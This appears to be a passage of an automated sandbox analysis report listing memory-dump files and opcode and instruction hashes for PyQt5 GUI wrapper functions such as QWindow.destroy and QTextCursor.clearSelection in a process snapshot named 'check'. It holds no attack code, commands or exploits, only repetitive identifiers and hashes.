                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setDropEnabled@Item@@Standard
                                                                                                                                                                                                                • String ID: QStandardItem$setDropEnabled$setDropEnabled(self, dropEnabled: bool)
                                                                                                                                                                                                                • API String ID: 3209070438-2807213632
                                                                                                                                                                                                                • Opcode ID: 8f30c8c65d1374bc3ead2048ca946199f63d4eda7d6ddba379547aee9f0f4f93
                                                                                                                                                                                                                • Instruction ID: f4493ba3ab12cf8f161826f7bb1f0f4c95d329f346935d7dc86017b2d1d08676
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f30c8c65d1374bc3ead2048ca946199f63d4eda7d6ddba379547aee9f0f4f93
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F1139B5A1CE56C1EB10DF21E8886A933B8FB48B88F9140B6CA5D03320CF7DD94AC700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setCheckable@Item@@Standard
                                                                                                                                                                                                                • String ID: QStandardItem$setCheckable$setCheckable(self, checkable: bool)
                                                                                                                                                                                                                • API String ID: 1326048647-3214107262
                                                                                                                                                                                                                • Opcode ID: f27461965f3bc925f05a99419965322310b01ae426d647abb52efb5d82064fce
                                                                                                                                                                                                                • Instruction ID: 769c63d202aed6b1913afd03a3ea14e2066205ef75be96639e53e68337cf8cc9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f27461965f3bc925f05a99419965322310b01ae426d647abb52efb5d82064fce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A31139B5A18E56C1EB10DF25E8886A933B8FB58B88F9140B6CA4D03320DF3DD95AC700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?device@Device@@DocumentTextWriter@@
                                                                                                                                                                                                                • String ID: QTextDocumentWriter$device$device(self) -> Optional[QIODevice]
                                                                                                                                                                                                                • API String ID: 3459829050-3328926645
                                                                                                                                                                                                                • Opcode ID: 3805ca1d78a6ad6afb268f5705f77967fe049671baa77cdd46bb60b65a28acfa
                                                                                                                                                                                                                • Instruction ID: ea6401979f8abe9b3713de51565a2ec8b89c69fe8c8da24e7c163e7d6b82fd36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3805ca1d78a6ad6afb268f5705f77967fe049671baa77cdd46bb60b65a28acfa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D01EDB5B08A46C1EB109F65E8586A937A8FB55B84F9140B2CD5D43320DF7DD589C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?documentLayout@QTextDocument@@QEBAPEAVQAbstractTextDocumentLayout@@XZ.QT5GUI ref: 00007FFB9A2E3C7B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?documentAbstractDocumentDocument@@Layout@Layout@@
                                                                                                                                                                                                                • String ID: QTextDocument$documentLayout$documentLayout(self) -> Optional[QAbstractTextDocumentLayout]
                                                                                                                                                                                                                • API String ID: 955490804-1570699827
                                                                                                                                                                                                                • Opcode ID: b045db14b424a919c4a8d009fdd13dc26b6a632c0bb66b79618433d081f56b60
                                                                                                                                                                                                                • Instruction ID: 067a85131a2681330a957203d286143cf2eaf27a62214266519774e9ec2330e5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b045db14b424a919c4a8d009fdd13dc26b6a632c0bb66b79618433d081f56b60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF010CB5B08A56C1EB10DF75E8986A937A8FB95B84FA180B2CE4D43320CF7DD55AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?compositionMode@QPaintEngineState@@QEBA?AW4CompositionMode@QPainter@@XZ.QT5GUI ref: 00007FFB9A359CCB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mode@$?compositionCompositionEnginePaintPainter@@State@@
                                                                                                                                                                                                                • String ID: QPaintEngineState$compositionMode$compositionMode(self) -> QPainter.CompositionMode
                                                                                                                                                                                                                • API String ID: 3537439247-1830017387
                                                                                                                                                                                                                • Opcode ID: 4a64675ec93c58d44ad7d68d798da7b31eb9d6b35ab82323187e7a8f1316018e
                                                                                                                                                                                                                • Instruction ID: 5d7393cd741e597d5e643c210354cedb5052713cda8c3906b99b5c0713b23359
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a64675ec93c58d44ad7d68d798da7b31eb9d6b35ab82323187e7a8f1316018e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0010CB5B08A46C1EB10CF75E8486A933A8FB95B54FA180B6CE4D43320DFBCD58AC340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?contentOrientation@QWindow@@QEBA?AW4ScreenOrientation@Qt@@XZ.QT5GUI ref: 00007FFB9A2FFC6B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Orientation@$?contentQt@@ScreenWindow@@
                                                                                                                                                                                                                • String ID: QWindow$contentOrientation$contentOrientation(self) -> Qt.ScreenOrientation
                                                                                                                                                                                                                • API String ID: 4268369361-3620501135
                                                                                                                                                                                                                • Opcode ID: 66f492f330abb709bf033cd9f0e5462c3b516b1d1e8816bf1f1ea02c179bff0c
                                                                                                                                                                                                                • Instruction ID: 8a5f194679f44a78c5bda076091bec131737a04913ff2c58e7059e8f36dc40c0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66f492f330abb709bf033cd9f0e5462c3b516b1d1e8816bf1f1ea02c179bff0c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F01E9B5B08A46C1EB50DF75E8486A937A8FB55B84FA140B2CE5D43320DF7CD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?destroy@Window@@
                                                                                                                                                                                                                • String ID: QWindow$destroy$destroy(self)
                                                                                                                                                                                                                • API String ID: 844748944-4162710497
                                                                                                                                                                                                                • Opcode ID: 71b8c474e7d83c9511029edc268aa47ed0aabb543f69c245889a56d69d8bdab3
                                                                                                                                                                                                                • Instruction ID: a3691ea23383107e61d780ce9f7d29e188d4418727116616e50e402a18a98791
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b8c474e7d83c9511029edc268aa47ed0aabb543f69c245889a56d69d8bdab3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 530100B5A08A56C1EB50DF25E8886A933B8FB95754F9140B2CE5D03330DF7CD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?clearCursor@@Selection@Text
                                                                                                                                                                                                                • String ID: QTextCursor$clearSelection$clearSelection(self)
                                                                                                                                                                                                                • API String ID: 2787548564-4141401258
                                                                                                                                                                                                                • Opcode ID: 8fa70b060d8bfb87ba1cd1f798a81c2135d1ce5aa4f90e1938bfb10effe50a1a
                                                                                                                                                                                                                • Instruction ID: fa1e38977142bcb8e64e9023de595ac8c579a6b893495ce327cab53cff82635e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fa70b060d8bfb87ba1cd1f798a81c2135d1ce5aa4f90e1938bfb10effe50a1a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7010CB5A08F5AC0EB209F65E8886A93778FB55B84F9140B2CA5D43330CF7DD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
